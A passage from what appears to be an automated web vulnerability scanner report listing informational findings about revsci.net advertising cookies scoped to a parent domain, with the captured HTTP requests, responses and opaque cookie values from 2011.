rsi_us_1000000="pUM14zlHMBYUrmdq3jPYy+fvNkbarDOrNPMu8ouLfPSa7vK/BcX90kVJuC+E8Has6dlUx3bukFx5JeMHyUzrCNgV7otr3jYrUbncbc9/za4G2QiQlpTv2oVz+pbm3ji4qQ3jNiGBq1TpyJwf6PZQJWVYz/YXRM2avV/gr4gWBBhn1FlMpjPfV9I3WpZjs3Y2Uxk4dpcWl6GPZPEHLqLCf3cg4dcaos7UNY3rTC0ZJQqSWG0qmeFNWn4e1Pz/3/M4NxQquywm/Kj6qn3G792z+rF5IZDAkGza9uQX3CQC4yOylDHjrefZbBktjDyI9BS6kdjFxVIOkDyWxNTtCuPhO/8y0zYtH/1XhYzeIL9j93s1xFHiYTpQfD/BZCEBrDobN712wvGvFMggBGFIb9DOD9sVQuOLPIfghf7n08chNbf2MMs1ZpeM3K3skCi6VWMaJtOX490aiszc03+RJXwsAo5h41UCWR/uyI4skTFrfaD1TRNW2H8/S3CAMuRaTu9rk2wopOpLqqDDcZjbqW29BmiZYLbc7Y8uUnBO2wsxZUviXh7J4+Yd+PY293p0UmNJp/yIwNei9sPUzKynkQ9sWomHNvCzgP6ccGGcbftnbpS5gr+C3uBIymBfMwCvaXNTp18jRw9bdzHgN6b/rvi5U2Xzeeq9cIpx1/LWfY/SB7Sp9lrPb5bDiuF26cpoop4k7uj9WoUKOtVQSaMwiLO6wtWw7Kbrdvwc9eJKtkMd0o3EiVghB2UJAW9d77VUQXHEZJQCOKorQuByi1kJICahjNh+sK7F9uFNParIk0KJosYR2M1h5gmiwt26uVxKxPCXzhSt8acnjbG9ekC9bd2ywq+ajRNFP9kshuZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSbnAGT8VWC+iP/tvOT6qvay++mLGOoka8n2m1i89tb7EQEPwtKFJx5mxALYgzTSkKgp8k+lr2WuWM4okUWVxgKfRVwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaCrnpU7RXnI88VOrJh20zOE03AF6VgK1GDzjxJ351lfepZljBEfpqCt31rZKRLBIqBzhyxPDcA745426LFm6X+mDkjZX/wgVphUrlvAKXovXxLCisclObE5JoAQi8OkgFDFWmqX2RnOopQLmI6/72y7PqB8m7K1nMFP7DjhVakUlSEZunh3zzQj/sJCaNx1vVJkY5l907gubQx/5NlrP3GYYMfTymwv0ET/r0v4PNdCTCuBBDY9429o0/woynt77J2dBJCXHbdrPcPj0ikfkpgfjNzsPK5rDrDI54g/DQQ4CTLlfPLYvLPZpjAB2HaKFMEq1UDxuflAVDtOn5w8xJbAv6z3CKsJhkBl4MU9XRlGJ9mAWyywciR43xEMwGgxlg3oj6igGgzYsDfqlh8IUw+Xg5AUgnF+VFde/nEROaxUQUQZg05nB/R/3eW2m8s4XMxoyUQ40BdX+Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6hADTnEHzIDa3EQzt6Kvf2zfJ8RpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylhbM3/U6flVFYr6o+ajbwEuv3tzU8fOSVVCM11Qz58zAAETx7FwrsaBDk0H/LnQ79HySum1XklVGk5QSVuYEmcvuZrS49HHdMb5MW6QMLt2QsX6A3ba9HG8mD4pI6niQ2H/YBsDxU8rf26e9M5CNJh+M5pYtRebY577BmSCBAGnvMkOGjL/H9x8w8yY0F6FXNvL92Uklc67eGro98OBw0MaSOsEXU8LDAzZFzVTMQyA=="; rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPixZ0W6zDG6mES70gBRV2cbgIsfnYVURrt1voweTUSq+JaAcAZcfMpau+hQFGNIZNW4KE+8+tv5ctHP8R0eNg8zAqI3kP9pFdrQsmOUA19iyAVNLDYKmj+5Unp77wIOYppmwgnW7reJezutwMWb+AE1+1QMb9AarH27s5beAFkpt9FQAS4ws3EEqTt1/78UvFi5mv8BeFLS0QXnyIWxVLA7TDYzYrT0cPoyL4tH41Wh/rAaMF0AXd27gs41zMVlm1YAKWHm/YkxR9kVPH5rdZ9yY87zYyN2qrgxmZlp5NE5VFWb86Tg/wCoQLErvfKAzA/QqqCjc6IdVrvG/E5RtpCc1owKBqlHaqqe7he1zAELLW5zxkD+HIy/Wlsss+OJ1L+ADs20x91UBXCmoOkk4BgR9/DblHIzoNwoE0mqqXV8jrb6iYexF2gIaglMT+Nw+rLYOPUYbtq4ae9N4dn99GlUgNhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaViiMCPE=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb38UyCaoMKH2FbmG7qbETfJ+iUcStl07WmLBcrwkxFT74l1sh7H1RXN2o49jramPHPxstlTbUbQ5HErONzX7Ba/SBBXPx1ncISsuK0TnDSB0/jUoLnAdvWGvSb7qIXU95z+1R9Olfwa/tX7EcaLWgFrOmy6Xv8IGQvUjgEzB0GqapaOF4PjMZ33qklQpoN3TigM4azUpRY5SR6o4ubpSwkMCV41n0BMVeEWjeG8UfMo8LjmHBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:07:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:07:26 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/7130573.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt+kIGTNsTU0ubO+NPCoReJg2v9kDss6IjP7s29IXDth7pVoc/oDyMfOQNUcbAGu3hxKy8B0iOCdNRbrR+EXBeFEV7Q/js8LsMFdUhDjs7NaErU8PMoCgVgff6p/HkTxSGDMg07rZiGYBIaY+6MFqw3p7qqa5kwP+g4bxF/asWvUviBZ+z6uGLjYPQKta/T7it1fuG0W0EJJGtMxk3W1s714eBqcBuzsemb4n0L++jvg4A+VMply718+zXAXl6qOpbglGw4aSr289n0jhzG0/TdWlDQ493y9kbAvoUn4mYYWEnNmEHHMOtBZJNCZ1aBtwqzcc/t9H7oqiGYornXErD3eSs6xQ4ErttD5Jnq4QmHuykUIjy7fo3wmSPlKfIoVN27ZyCeeKeivwEYPC1GsDA47t0nNgnBYI3cPPTUlzvUjSchlwUix8cw9WutYc4yd0N5Le6hD4JqBP2kPoNQM8Q2VcBtrLKGxlaLEixms2T8rRrkIyabl2HAzES7hMbIMbiVH6Uih8aDMyGfgJZH9qE7QSduaCJalpeBaZ3QnazCPCV9mXeWzxpYNIkHkqgNa0RwsEKu8Co2u+iOIHZwsXd4W0Ky4aWpDyE8+ca6Y6pnWpNfg88hvg+aSNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:58:29 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/7130573.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_huL1="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMKplM1SF6IV/GkJdNcmYgL2c8DIkhMma7ijBtB3Yl514E3J4uXftdqpxOzsrbA6vCRMDOAP39VqMDNGw9XQbjrptRUQu1WfIuuYwo0l2O0tJSlKuWKJDMSomB5FjVzZQq7ocv/wqjzd0mY82YC1rmbM45cBkIFSn3NtFyXhLMJuvvbHizzyv/e3XQLwn3Lss6bUjNcm/zC5FISMr6EthRBkWZ7t66Yh6xODm9WJXmKZb6TA29nBZQ9Qs91kMNnb5FdHB4NabFE4O2DqWD9S46tKRWyNPYSTjdkMVnao9UBn2NXAho4kpDBODS1qwCauQZ0uMyS8ycC/DUOKDJNVRrcABYxerMtjIjXQ3SIOwyF1ZHJpSAhw+/sU9FR8tRcwLwx9LxYYnicm0G3EU5FtcdOQcEAewt5/v4OAMzZn5ctcZhu1lXpYC0lGRiWlkgQ7HQI+Iukalu60dQPOeAi1KaZA7qiBDtrthVC4cfW+839zpgrb8nIQ5/KU+Nk3qHJ471eYwk8Gfedh0DAfonNNRLUYEjTtXBubbQxuEojm0n8mhQjTegWqmedstb2rI9HZEt1rWj4ULDJ3UMOG503BhTG/H+ricN8DtrGqaHhICSOIU2ry/BYp/5fZ5h7nrfZscmyIDZ+aYYL9JYu44vRk2so/JPC2p088cWu7ZHB1QDqoiWyI4yhC0usrJE8NzcEGtaocAdKZwjlIDKjq1um5Obfi8OUZ2k5m64PWoatIrW1LkfyikIetmVHAIYQQpNkAmNLj50E94AGCQNK8Ict4pt7fB7Trgtkw1Dh3KnSXcvOC3MhYadLkcMW/aZMkurygiB1UO7l0C+DjE+hgzO8FRDxSMU+qU5xRwG0TUVsdzQ3piMMAaLm9Dh6V/q9Yir7zF4vSrz38MvZKtGi5QGIQRqQQWd7VpTieu2pgQud/BeND/PDOTMYY78vNlFT/kBis6LhmjS8ayPliJI1CLZaezlTWAQ8OxslgD4pSxtZeUyOs/k6Aps/h7H+vccU+K5AnoSLckBiYE2tUsfsTXTmPQzYBG79TJ3lI68gXNT+4YkIsDKcAv+tmF5uVWy6h92Y0RrLS1oKLLd1ccFcvsp5HVsg+AhJ35cZU99r9HtFhicRNDWfxramhMjWdLFf3EneyZPwSyAC/pZQmWoS3rqh7Yb/wkPcwUjVHEi4EErYapJ65tXZXqdShYkdIULXt7cwJZRdBsvGAmY13R6MclBXN1XGuPMqg145Pq8KvKziF8PzcPdW6rkfSJnrASwYjNyLFRUbK0ccTeB39zKLwfgpd1vYGCWtQ=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQHqPWGVBoPQ5qDnE4f4490XP0EkiECgKBWcP4HFPlL+GA0Yx4p2wY6YehvXKmXjhO2zHk7FSaVnedyaWLSCgj/Wf2jkHJpg7Oz8ZDnPr33K4mIIg5fCNw/hiAoQXsDpuJqnIX76+xkUy8496+zYT9dOyphS3JAk1jZacGQ5iCpEF58Le7/oaAtlgr/4cOUdgDNPhjERae2lc7hfSXsbRkhwO4CnqmL66b6gy1RThzjP1fajkWfgYToZrgn7EoLwodUiB4VECfP4XvVvoHlGaOa2dJ/5mSJ9am8Y4JA5WupCHExComu1IUsjbI8pu65896BoMyC939MxKf8xRMsvT4IbxQ2ok0fplAi/9GmZyk1pvvB2mu4oyyNzVR+DeVSolgwS13WCG305dNK6M4n1Ovwx92tcFhezVswYZD6HeErbhZonDNXdnMlU/w03lmtVIhUf42kEz17cO7sP9/GGluSGc/LWpfZdITPx9Gnt0quHmz4ac0JKzRH9hJAyLH0iVG6eniv8xD7ATCp9itmThAcx7piTR9JMVUd2TLn7KR6qIjEE/WP6HYU+bOa6PzpSNqFFNUKKW2dsDEVMZinKhLdVIEZ5n81mrKFskOY7o/c3TqxLlSRLQNIxO0l69PUoSJu2mc4ZzAFmbHrZ3YTUF8gpT6z7jFB0yIZHzJiNektrIHChsgS7i21adBnJtf/MULmkKAbJ1uA4xWdUkSbUsr+n8vJ8Ke6Y9g2NE6Puysk3UBWoHyXgp5W9Bbx3mRbxQL3BvFugxby5p2oFWn4P8G1ADr3U9ekflaAaLJ2Ncb+bxQ6YpOy5RkTpa1tLFS11cw8WjJ3TRzjkAHy6aeX2o1+XfOPCvkBA7587b+iRf8/r5S79nMn2rrdN/hsJWRgt1f5/bCl9+rynOEQ1H0iKPjVkKE87uxE/WJPJDTTwZjwTa6a9ykVaD1MDLLGgvxgYUWLZJiEiFwd+WPs2EstzUkgUPV3loc5LtfRfmV55RnKOvFm27Yrx8cewNRW3xaR4iO6AsD+SkUsjLFYjd9DatZRwuLTMZD1P54i1DU3St+iJvQbstqW2qjT/4Cpk8JmtVf/rmUsR7xX0lmqbePfLRsaAluaa4SG2B/mlYfc01IhnXTYPGYpQkSvZkLhv6BHjJ6P/65/Ega9xWI944EzdWtRfDcNwnY1gJ1X34rfoLQBrKKoyMsV+AmGFBfyuALM5v7ObxGDGEg5Dm4hLFRrL+FzLB8HeW6gk2WMVQ5FUPv+VIDYw/q+kiLMb5O92OYLiw5Xbpu9RVoh2YJcgV0ZXCE3gQNsFTX3WQfnkxkqTvaRBwJL/EFYEsjR+z1ai9DuCSYT9CtsYO0MbFcYA8yPfyVM/nmJNELCct7tIw2/6Dl6AZ5z5TU1WcdXUr5hr5ozxK/0DeyTtj7fX4gvYutFH9OwTMWb6yfjZwKRBW/ueVhOtw9JX00yHdeNkM9a+1V3lc5PYk08xs+rxYYUT/Y4RcbrBg6ro5Y5lKpzjnl1iHrtRFRkvM6Bhbrpz4MJejvDbyOCoTJQiIcMmzkTPed4yPgT1i9pp9YvG23mohnI4CT6yfazgta+CUjAcvxPjHsqWJD8LRAklIQEKszkaP0CytldXbdWThqU9+S+/RiwQpCBSDJJNkriCXQKeDR6PE9WuTl9Q9UIyEZDuBaNMw7U3iYoAmWgsT8wHIoKVVELX7KB7+RREhAxJdlywRG7cMosTpmvo9Ypktb/UoZRwTwdFor/1JTfw+rjJFlrHr9CgB0EELgz9Jm"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhTNXCMEH9IHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBhbIQWRbm/5UVa9Cw8fcNBXphT6vuj41246c95NOaRAsl5hE/ZAjYxYjoNKJOMaB8zMKLvt3ZOtUQNGymCc6cwMjAEkPYxMQCSN3jbzqgvucruysvtgIm4ImCG514O14yoCMqtWDmrZ9sySuq22HOY9Wj4x9r1nP8jPbQ33vrEBKu/I4UMIEOyd4PvTE84MuRfNUnBabHA3/LDlToXvABg1h+tni86zNZ4y4rtynavRlT/kSyPXb4prWAJZ20JkRmrkbexC3ZQMvHZ0ZtyNv/CzYfZ4IS/mBu6u3BkTI0M9KmKu+iFwl2RGN4K+YxJpNj4RWgZvpx9Sgfo7xrJtyFxQDiBbF5vtisKQ/9jsq5u1tp+Ci81NVHlXAa5Myp241n53/vXuLGNQ7+A4YP9fMj9YoXRz4C94XH9t43DdbxtEhIdP+ToPdlcHF7w4RNkdQpNMTYd+PqsKZW0YZQh8Nnv0x

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt+kIGTNsTU0ubO+NPCoReJg2v9kDss6IjP7s29IXDth7pVoc/oDyMfOQNUcbAGu3hxKy8B0iOCdNRbrR+EXBeFEV7Q/js8LsMFdUhDjs7NaErU8PMoCgVgff6p/HkTxSGDMg07rZiGYBIaY+6MFqw3p7qqa5kwP+g4bxF/asWvUviBZ+z6uGLjYPQKta/T7it1fuG0W0EJJGtMxk3W1s714eBqcBuzsemb4n0L++jvg4A+VMply718+zXAXl6qOpbglGw4aSr289n0jhzG0/TdWlDQ493y9kbAvoUn4mYYWEnNmEHHMOtBZJNCZ1aBtwqzcc/t9H7oqiGYornXErD3eSs6xQ4ErttD5Jnq4QmHuykUIjy7fo3wmSPlKfIoVN27ZyCeeKeivwEYPC1GsDA47t0nNgnBYI3cPPTUlzvUjSchlwUix8cw9WutYc4yd0N5Le6hD4JqBP2kPoNQM8Q2VcBtrLKGxlaLEixms2T8rRrkIyabl2HAzES7hMbIMbiVH6Uih8aDMyGfgJZH9qE7QSduaCJalpeBaZ3QnazCPCV9mXeWzxpYNIkHkqgNa0RwsEKu8Co2u+iOIHZwsXd4W0Ky4aWpDyE8+ca6Y6pnWpNfg88hvg+aSNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:58:29 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:58:28 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/715243108.js

